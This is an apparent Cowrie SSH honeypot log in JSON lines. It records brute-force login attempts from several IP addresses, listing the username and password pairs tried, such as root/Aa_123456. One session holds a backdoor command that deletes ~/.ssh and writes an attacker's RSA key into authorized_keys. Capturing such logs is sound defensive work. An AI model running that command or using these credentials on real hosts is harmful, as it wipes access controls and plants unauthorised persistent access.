{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-09T04:23:49.372289Z","src_ip":"212.227.125.160","session":"79baf4625e0e"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":42844,"dst_ip":"1.2.3.4","dst_port":22,"session":"fff1cb5296b3","protocol":"ssh","message":"New connection: 192.210.135.20:42844 (1.2.3.4:22) [session: fff1cb5296b3]","sensor":"my-vps","timestamp":"2025-09-09T04:23:51.207829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:51.209253Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:51.328483Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa_123456","message":"login attempt [root/Aa_123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:51.803255Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:52.097346Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:23:52.098017Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:23:52.098885Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:52.218763Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:54.225912Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.226675Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.336038Z","src_ip":"212.227.125.160","session":"79baf4625e0e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.347458Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.348229Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":45906,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe1063372c5d","protocol":"ssh","message":"New connection: 192.210.135.20:45906 (1.2.3.4:22) [session: fe1063372c5d]","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.455592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.457247Z","src_ip":"192.210.135.20","session":"fe1063372c5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:54.566768Z","src_ip":"192.210.135.20","session":"fe1063372c5d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:23:55.043061Z","src_ip":"192.210.135.20","session":"fe1063372c5d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.155277Z","src_ip":"192.210.135.20","session":"fe1063372c5d"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":46820,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac30f327170a","protocol":"ssh","message":"New connection: 192.210.135.20:46820 (1.2.3.4:22) [session: ac30f327170a]","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.263691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.264587Z","src_ip":"192.210.135.20","session":"ac30f327170a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.373498Z","src_ip":"192.210.135.20","session":"ac30f327170a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.850309Z","src_ip":"192.210.135.20","session":"ac30f327170a"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.960691Z","src_ip":"192.210.135.20","session":"fff1cb5296b3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:56.961462Z","src_ip":"192.210.135.20","session":"ac30f327170a"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":48540,"dst_ip":"1.2.3.4","dst_port":22,"session":"016a0647e3b4","protocol":"ssh","message":"New connection: 154.209.4.55:48540 (1.2.3.4:22) [session: 016a0647e3b4]","sensor":"my-vps","timestamp":"2025-09-09T04:24:13.958467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:24:13.962701Z","src_ip":"154.209.4.55","session":"016a0647e3b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:24:14.168687Z","src_ip":"154.209.4.55","session":"016a0647e3b4"}
{"eventid":"cowrie.login.failed","username":"frappe-user","password":"123456","message":"login attempt [frappe-user/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:24:15.006552Z","src_ip":"154.209.4.55","session":"016a0647e3b4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:24:16.221320Z","src_ip":"154.209.4.55","session":"016a0647e3b4"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":8890,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffa4e37d2d6d","protocol":"ssh","message":"New connection: 211.22.25.164:8890 (1.2.3.4:22) [session: ffa4e37d2d6d]","sensor":"my-vps","timestamp":"2025-09-09T04:24:24.819854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:24:24.820756Z","src_ip":"211.22.25.164","session":"ffa4e37d2d6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:24:25.060105Z","src_ip":"211.22.25.164","session":"ffa4e37d2d6d"}
{"eventid":"cowrie.login.failed","username":"sbserver","password":"sbserver","message":"login attempt [sbserver/sbserver] failed","sensor":"my-vps","timestamp":"2025-09-09T04:24:26.061964Z","src_ip":"211.22.25.164","session":"ffa4e37d2d6d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:24:27.304349Z","src_ip":"211.22.25.164","session":"ffa4e37d2d6d"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":39820,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2a6ee1ef16a","protocol":"ssh","message":"New connection: 103.59.95.12:39820 (1.2.3.4:22) [session: c2a6ee1ef16a]","sensor":"my-vps","timestamp":"2025-09-09T04:24:34.577759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:24:34.578451Z","src_ip":"103.59.95.12","session":"c2a6ee1ef16a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:24:35.313142Z","src_ip":"103.59.95.12","session":"c2a6ee1ef16a"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"P@ssw0rd","message":"login attempt [gpadmin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T04:24:36.422447Z","src_ip":"103.59.95.12","session":"c2a6ee1ef16a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:24:37.694817Z","src_ip":"103.59.95.12","session":"c2a6ee1ef16a"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":44140,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7d13f636c3a","protocol":"ssh","message":"New connection: 192.210.135.20:44140 (1.2.3.4:22) [session: b7d13f636c3a]","sensor":"my-vps","timestamp":"2025-09-09T04:24:46.483518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:24:46.484448Z","src_ip":"192.210.135.20","session":"b7d13f636c3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:24:46.593185Z","src_ip":"192.210.135.20","session":"b7d13f636c3a"}
{"eventid":"cowrie.login.failed","username":"install","password":"install.123","message":"login attempt [install/install.123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:24:47.083310Z","src_ip":"192.210.135.20","session":"b7d13f636c3a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:24:48.195455Z","src_ip":"192.210.135.20","session":"b7d13f636c3a"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":42146,"dst_ip":"1.2.3.4","dst_port":22,"session":"773402f833c5","protocol":"ssh","message":"New connection: 51.81.118.153:42146 (1.2.3.4:22) [session: 773402f833c5]","sensor":"my-vps","timestamp":"2025-09-09T04:25:00.742004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:00.742654Z","src_ip":"51.81.118.153","session":"773402f833c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:00.838061Z","src_ip":"51.81.118.153","session":"773402f833c5"}
